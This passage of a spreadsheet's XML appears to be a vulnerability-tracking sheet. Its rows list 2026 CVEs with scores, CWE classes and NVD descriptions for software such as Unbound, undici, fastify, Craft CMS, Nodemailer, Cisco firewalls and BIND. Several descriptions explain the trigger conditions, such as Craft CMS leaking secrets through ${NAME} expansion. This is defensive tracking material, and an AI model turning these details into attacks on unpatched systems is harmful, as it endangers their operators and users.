      <c r="S1045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82561</t>
        </is>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1046" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82720</t>
        </is>
      </c>
      <c r="D1046" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1046" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1046" s="5" t="inlineStr">
        <is>
          <t>sep@nlnetlabs.nl</t>
        </is>
      </c>
      <c r="G1046" s="5" t="inlineStr"/>
      <c r="H1046" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1046" s="5" t="inlineStr"/>
      <c r="J1046" s="5" t="inlineStr"/>
      <c r="K1046" s="5" t="inlineStr"/>
      <c r="L1046" s="5" t="inlineStr"/>
      <c r="M1046" s="5" t="inlineStr"/>
      <c r="N1046" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1046" s="5" t="inlineStr"/>
      <c r="Q1046" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1046" s="5" t="inlineStr">
        <is>
          <t>NLnet Labs Unbound 1.12.0 up to and including 1.26.0 has a use-after-free vulnerability when compiled for DNS-over-HTTPs support with '--with-libnghttp2'. During failure code paths (i.e., RPZ drop query, jostle due to heavy traffic), a dropped DoH stream brings down the whole DoH session and does not account properly for other DoH streams in the same session. This leads to use-after-free in those code paths. If the prerequisites are satisfied (possible RPZ drop or heavy client traffic), a malicious actor can trigger the vulnerability with a single DoH connection and the appropriate traffic. Impact is limited as the reads are not user controlled and the use-after-free leads to early returns. However, a hardened allocator can catch the use-after-free and controllably terminate the process resulting to denial of service.</t>
        </is>
      </c>
      <c r="S1046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82720</t>
        </is>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1047" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84522</t>
        </is>
      </c>
      <c r="D1047" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1047" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1047" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1047" s="5" t="inlineStr"/>
      <c r="H1047" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1047" s="5" t="inlineStr"/>
      <c r="J1047" s="5" t="inlineStr"/>
      <c r="K1047" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1047" s="5" t="inlineStr"/>
      <c r="M1047" s="5" t="inlineStr"/>
      <c r="N1047" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1047" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1047" s="5" t="inlineStr"/>
      <c r="Q1047" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1047" s="5" t="inlineStr">
        <is>
          <t>A race condition was addressed with improved state management. This issue is fixed in macOS Golden Gate 27. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S1047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84522</t>
        </is>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1048" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84554</t>
        </is>
      </c>
      <c r="D1048" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1048" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1048" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1048" s="5" t="inlineStr"/>
      <c r="H1048" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1048" s="5" t="inlineStr"/>
      <c r="J1048" s="5" t="inlineStr"/>
      <c r="K1048" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1048" s="5" t="inlineStr"/>
      <c r="M1048" s="5" t="inlineStr"/>
      <c r="N1048" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1048" s="5" t="inlineStr"/>
      <c r="Q1048" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R1048" s="5" t="inlineStr">
        <is>
          <t>An integer overflow was addressed with improved input validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An attacker in a privileged network position may be able to cause a denial-of-service.</t>
        </is>
      </c>
      <c r="S1048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84554</t>
        </is>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1049" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85024</t>
        </is>
      </c>
      <c r="D1049" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1049" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1049" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G1049" s="5" t="inlineStr"/>
      <c r="H1049" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1049" s="5" t="inlineStr"/>
      <c r="J1049" s="5" t="inlineStr"/>
      <c r="K1049" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="L1049" s="5" t="inlineStr"/>
      <c r="M1049" s="5" t="inlineStr"/>
      <c r="N1049" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1049" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1049" s="5" t="inlineStr"/>
      <c r="Q1049" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R1049" s="5" t="inlineStr">
        <is>
          <t>undici bundles a WebSocket client whose permessage-deflate size-limit cleanup removes all listeners from the internal zlib inflate stream, including its error listener, while that stream can still emit. When a remote peer sends a compressed payload that crosses the built-in 128 MiB decompressed-payload limit and then contains a malformed DEFLATE byte, the inflate stream emits a data error with no listener attached, which Node.js treats as a fatal unhandled error and terminates the entire process. Exploitation is remote and unauthenticated, requires no application mistake, and is asymmetric, since roughly 130 KB on the wire expands past the limit and crashes the process, and reconnecting can repeat the crash. This affects undici versions from 6.25.0 up to 6.28.1, from 7.28.0 up to 7.29.1, and from 8.1.0 up to 8.10.2. Users should upgrade to undici 6.28.1, 7.29.1, or 8.10.2.</t>
        </is>
      </c>
      <c r="S1049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85024</t>
        </is>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1050" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87123</t>
        </is>
      </c>
      <c r="D1050" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1050" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1050" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G1050" s="5" t="inlineStr"/>
      <c r="H1050" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1050" s="5" t="inlineStr"/>
      <c r="J1050" s="5" t="inlineStr"/>
      <c r="K1050" s="5" t="inlineStr"/>
      <c r="L1050" s="5" t="inlineStr"/>
      <c r="M1050" s="5" t="inlineStr"/>
      <c r="N1050" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1050" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1050" s="5" t="inlineStr"/>
      <c r="Q1050" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R1050" s="5" t="inlineStr">
        <is>
          <t>hbs is an Express view engine wrapper for Handlebars. Version 4.3.0 can crash the Node.js process during output escaping when an async helper, registered with registerAsyncHelper, resolves to an object whose toHTML property is truthy but not callable. Handlebars escapeExpression calls the toHTML method on any value that has a truthy toHTML, so such a value throws a TypeError, and because the async substitution runs on a later tick outside the render function's try/catch, the throw is an uncaught exception that terminates the process without sending a response. Only version 4.3.0 is affected, since the throwing escape was introduced by the fix for CVE-2026-16231 and earlier versions do not escape async helper values. It can be triggered remotely when an async helper resolves to an externally influenced object such as parsed JSON. The issue is fixed in hbs 4.3.1, and users should upgrade to hbs 4.3.1 or later.</t>
        </is>
      </c>
      <c r="S1050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87123</t>
        </is>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1051" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89156</t>
        </is>
      </c>
      <c r="D1051" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1051" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1051" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1051" s="5" t="inlineStr"/>
      <c r="H1051" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1051" s="5" t="inlineStr"/>
      <c r="J1051" s="5" t="inlineStr"/>
      <c r="K1051" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L1051" s="5" t="inlineStr"/>
      <c r="M1051" s="5" t="inlineStr"/>
      <c r="N1051" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1051" s="5" t="inlineStr"/>
      <c r="Q1051" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1051" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48 has a pcre2_match out-of-bounds read after a JIT fallback when an attacker can provide invalid UTF data.</t>
        </is>
      </c>
      <c r="S1051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89156</t>
        </is>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1052" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92081</t>
        </is>
      </c>
      <c r="D1052" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1052" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1052" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G1052" s="5" t="inlineStr"/>
      <c r="H1052" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1052" s="5" t="inlineStr"/>
      <c r="J1052" s="5" t="inlineStr"/>
      <c r="K1052" s="5" t="inlineStr"/>
      <c r="L1052" s="5" t="inlineStr"/>
      <c r="M1052" s="5" t="inlineStr"/>
      <c r="N1052" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1052" s="5" t="inlineStr"/>
      <c r="Q1052" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R1052" s="5" t="inlineStr">
        <is>
          <t>fastify is a fast and low-overhead web framework for Node.js. In versions before 5.12.5, when a route registers a response trailer via reply.trailer() and is served over HTTP/2, fastify unconditionally sets the Transfer-Encoding: chunked header, which is forbidden on HTTP/2, so Node.js throws while serializing the response headers. The exception is not caught and becomes an uncaughtException, so a single unauthenticated HTTP/2 request to any route that uses trailers crashes the server process and drops all in-flight requests, and it can be repeated on every restart. The issue is fixed in fastify 5.12.5, and users should upgrade to 5.12.5 or later. As a workaround, avoid registering response trailers with reply.trailer() on routes served over HTTP/2 until upgrading.</t>
        </is>
      </c>
      <c r="S1052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92081</t>
        </is>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1053" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92091</t>
        </is>
      </c>
      <c r="D1053" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1053" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1053" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1053" s="5" t="inlineStr"/>
      <c r="H1053" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1053" s="5" t="inlineStr"/>
      <c r="J1053" s="5" t="inlineStr"/>
      <c r="K1053" s="5" t="inlineStr"/>
      <c r="L1053" s="5" t="inlineStr"/>
      <c r="M1053" s="5" t="inlineStr"/>
      <c r="N1053" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1053" s="5" t="inlineStr"/>
      <c r="Q1053" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R1053" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in jwcrypto. The JWK.import_key() function validates the key_ops JWK member for duplicate values using an algorithm with O(n^2) time complexity, and the length of key_ops is not bounded. A remote, unauthenticated attacker can supply a JWK with a large key_ops array to an application that passes attacker-controlled key material to a public key-import API (reachable via ECDH-ES key agreement, OIDC dynamic client registration, DPoP, or ACME account key registration, among others) to consume excessive CPU time, resulting in a denial of service.</t>
        </is>
      </c>
      <c r="S1053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92091</t>
        </is>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1054" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92591</t>
        </is>
      </c>
      <c r="D1054" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1054" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1054" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1054" s="5" t="inlineStr"/>
      <c r="H1054" s="5" t="inlineStr"/>
      <c r="I1054" s="5" t="inlineStr"/>
      <c r="J1054" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K1054" s="5" t="inlineStr"/>
      <c r="L1054" s="5" t="inlineStr"/>
      <c r="M1054" s="5" t="inlineStr"/>
      <c r="N1054" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1054" s="5" t="inlineStr"/>
      <c r="Q1054" s="5" t="inlineStr">
        <is>
          <t>CWE-636</t>
        </is>
      </c>
      <c r="R1054" s="5" t="inlineStr">
        <is>
          <t>Craft CMS 5.0.0 through 5.10.12 treats a database connection failure as meaning that Craft is not installed, which makes anonymous installer actions — including install/validate-site — reachable on an installed production site whenever PHP remains available but the configured MySQL endpoint does not. The action accepts a site name, serializes it through Site::getName(), and expands ${NAME} expressions using App::env(). An unauthenticated attacker who obtained a guest session cookie and matching CSRF token before the outage and whose session remains valid during it can submit a predictable variable name (for example Craft's conventional CRAFT_SECURITY_KEY) and receive its value, disclosing Craft secrets, process environment variables, $_SERVER entries, or PHP constants such as the security key, database credentials, or API keys. The issue requires an independently occurring database outage; the vulnerability itself provides no way to induce it. Fixed in 5.10.13.</t>
        </is>
      </c>
      <c r="S1054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92591</t>
        </is>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1055" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92595</t>
        </is>
      </c>
      <c r="D1055" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E1055" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1055" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1055" s="5" t="inlineStr"/>
      <c r="H1055" s="5" t="inlineStr"/>
      <c r="I1055" s="5" t="inlineStr"/>
      <c r="J1055" s="5" t="inlineStr"/>
      <c r="K1055" s="5" t="inlineStr"/>
      <c r="L1055" s="5" t="inlineStr"/>
      <c r="M1055" s="5" t="inlineStr"/>
      <c r="N1055" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1055" s="5" t="inlineStr"/>
      <c r="Q1055" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R1055" s="5" t="inlineStr">
        <is>
          <t>Nodemailer (npm package `nodemailer`) versions 9.1.0 and earlier do not honor the `disableFileAccess` and `disableUrlAccess` sandbox options when message content is resolved through the public plugin API `MailMessage.resolveContent()` using the documented legacy three-argument signature `resolveContent(data, key, callback)`. Because `shared.resolveContent()` normalizes the missing `options` argument to an empty object, the message-level flags copied into `mail.data` by the MailMessage constructor are discarded, and `resolveContentValue()` skips both access-control checks, reaching `nmfetch(url)` or `fs.createReadStream(path)`. As a result, plugin or application code that resolves untrusted message content (html, text, attachment `path` or `href`) via this API can be induced to read arbitrary local files or issue outbound HTTP(S) requests (server-side request forgery), bypassing the sandbox the application enabled. The internal paths used by `transporter.sendMail()` (`resolveAll()`, `_convertDataImages()`, and the MIME streaming path) are not affected. Fixed in version 9.1.1.</t>
        </is>
      </c>
      <c r="S1055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92595</t>
        </is>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1056" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20120</t>
        </is>
      </c>
      <c r="D1056" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E1056" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1056" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1056" s="5" t="inlineStr"/>
      <c r="H1056" s="5" t="inlineStr"/>
      <c r="I1056" s="5" t="inlineStr"/>
      <c r="J1056" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1056" s="5" t="inlineStr"/>
      <c r="L1056" s="5" t="inlineStr"/>
      <c r="M1056" s="5" t="inlineStr"/>
      <c r="N1056" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1056" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1056" s="5" t="inlineStr"/>
      <c r="Q1056" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1056" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the access control list (ACL) Object Group Search (OGS) implementation of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass configured access controls.
This vulnerability is due to a logic error in populating group access control policies (ACPs) with OGS configured. An attacker could exploit this vulnerability by sending traffic that should be blocked through the device. A successful exploit could allow the attacker to bypass access controls and reach devices in protected networks.</t>
        </is>
      </c>
      <c r="S1056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20120</t>
        </is>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1057" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20290</t>
        </is>
      </c>
      <c r="D1057" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E1057" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1057" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1057" s="5" t="inlineStr"/>
      <c r="H1057" s="5" t="inlineStr"/>
      <c r="I1057" s="5" t="inlineStr"/>
      <c r="J1057" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1057" s="5" t="inlineStr"/>
      <c r="L1057" s="5" t="inlineStr"/>
      <c r="M1057" s="5" t="inlineStr"/>
      <c r="N1057" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1057" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1057" s="5" t="inlineStr"/>
      <c r="Q1057" s="5" t="inlineStr">
        <is>
          <t>CWE-805</t>
        </is>
      </c>
      <c r="R1057" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in SSL/TLS certificate parsing in the Snort 2 Detection Engine of Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause the Snort 2 Detection Engine to restart.
This vulnerability is due to incomplete validation of the SSL certificate. An attacker could exploit this vulnerability by sending a crafted SSL connection setup request to be parsed by Snort 2. A successful exploit could allow the attacker to cause the Snort 2 Detection Engine to restart unexpectedly, resulting in a denial of service (DoS) condition.</t>
        </is>
      </c>
      <c r="S1057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20290</t>
        </is>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1058" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78301</t>
        </is>
      </c>
      <c r="D1058" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E1058" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1058" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1058" s="5" t="inlineStr"/>
      <c r="H1058" s="5" t="inlineStr"/>
      <c r="I1058" s="5" t="inlineStr"/>
      <c r="J1058" s="5" t="inlineStr"/>
      <c r="K1058" s="5" t="inlineStr"/>
      <c r="L1058" s="5" t="inlineStr"/>
      <c r="M1058" s="5" t="inlineStr"/>
      <c r="N1058" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1058" s="5" t="inlineStr"/>
      <c r="Q1058" s="5" t="inlineStr">
        <is>
          <t>CWE-349</t>
        </is>
      </c>
      <c r="R1058" s="5" t="inlineStr">
        <is>
          <t>A malformed zone may contain an NS or DNAME node above its origin, which `named` treats as a zone cut. If an attacker inserts a malformed zone into a BIND authoritative server (e.g., via zone transfer), queries for names inside the configured zone then lose authoritative status and return an out-of-zone delegation. On a server that also provides recursion BIND can follow this locally sourced cut and cache attacker-supplied data, affecting names outside the configured zone. This situation persists as long as the malformed zone remains in the zone database.
This issue affects BIND 9 versions 9.11.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.11.3-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S1058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78301</t>
        </is>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1059" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54246</t>
        </is>
      </c>
      <c r="D1059" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E1059" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1059" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1059" s="5" t="inlineStr"/>
      <c r="H1059" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1059" s="5" t="inlineStr"/>
      <c r="J1059" s="5" t="inlineStr">
        <is>
          <t>kubernetes, redis</t>
        </is>
      </c>
      <c r="K1059" s="5" t="inlineStr"/>
      <c r="L1059" s="5" t="inlineStr"/>
      <c r="M1059" s="5" t="inlineStr"/>
      <c r="N1059" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1059" s="5" t="inlineStr"/>
      <c r="Q1059" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R1059" s="5" t="inlineStr">
        <is>
          <t>Skipper is an HTTP router and reverse proxy for service composition. Prior to 0.27.13, the routesrv component serves cluster-wide control-plane data without application-layer authentication through /routes, /routes/{zone}, /swarm/redis/shards, and /swarm/valkey/shards. The handlers registered in routesrv/routesrv.go, eskipBytes.ServeHTTP in routesrv/eskipbytes.go, RedisHandler.ServeHTTP in routesrv/redishandler.go, and ValkeyHandler.ServeHTTP in routesrv/valkeyhandler.go only restrict HTTP methods and do not authenticate callers. A compromised or otherwise attacker-controlled pod that can reach routesrv on the Kubernetes cluster network can bypass its namespace-scoped RBAC and read Ingress and RouteGroup backend URLs, filter-chain and OAuth or OIDC path details, and Redis or Valkey shard addresses across namespaces. NetworkPolicy can restrict reachability but does not remove the missing-authentication condition, and the established impact is confidentiality exposure rather than direct integrity or availability loss. This issue is fixed in version 0.27.13.</t>
        </is>
      </c>
      <c r="S1059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54246</t>
        </is>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1060" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87910</t>
        </is>
      </c>
      <c r="D1060" s="5" t="n">
        <v>5.7</v>
      </c>
      <c r="E1060" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1060" s="5" t="inlineStr">
        <is>
          <t>cna@python.org</t>
        </is>
      </c>
      <c r="G1060" s="5" t="inlineStr"/>
      <c r="H1060" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1060" s="5" t="inlineStr"/>
      <c r="J1060" s="5" t="inlineStr"/>
      <c r="K1060" s="5" t="inlineStr"/>
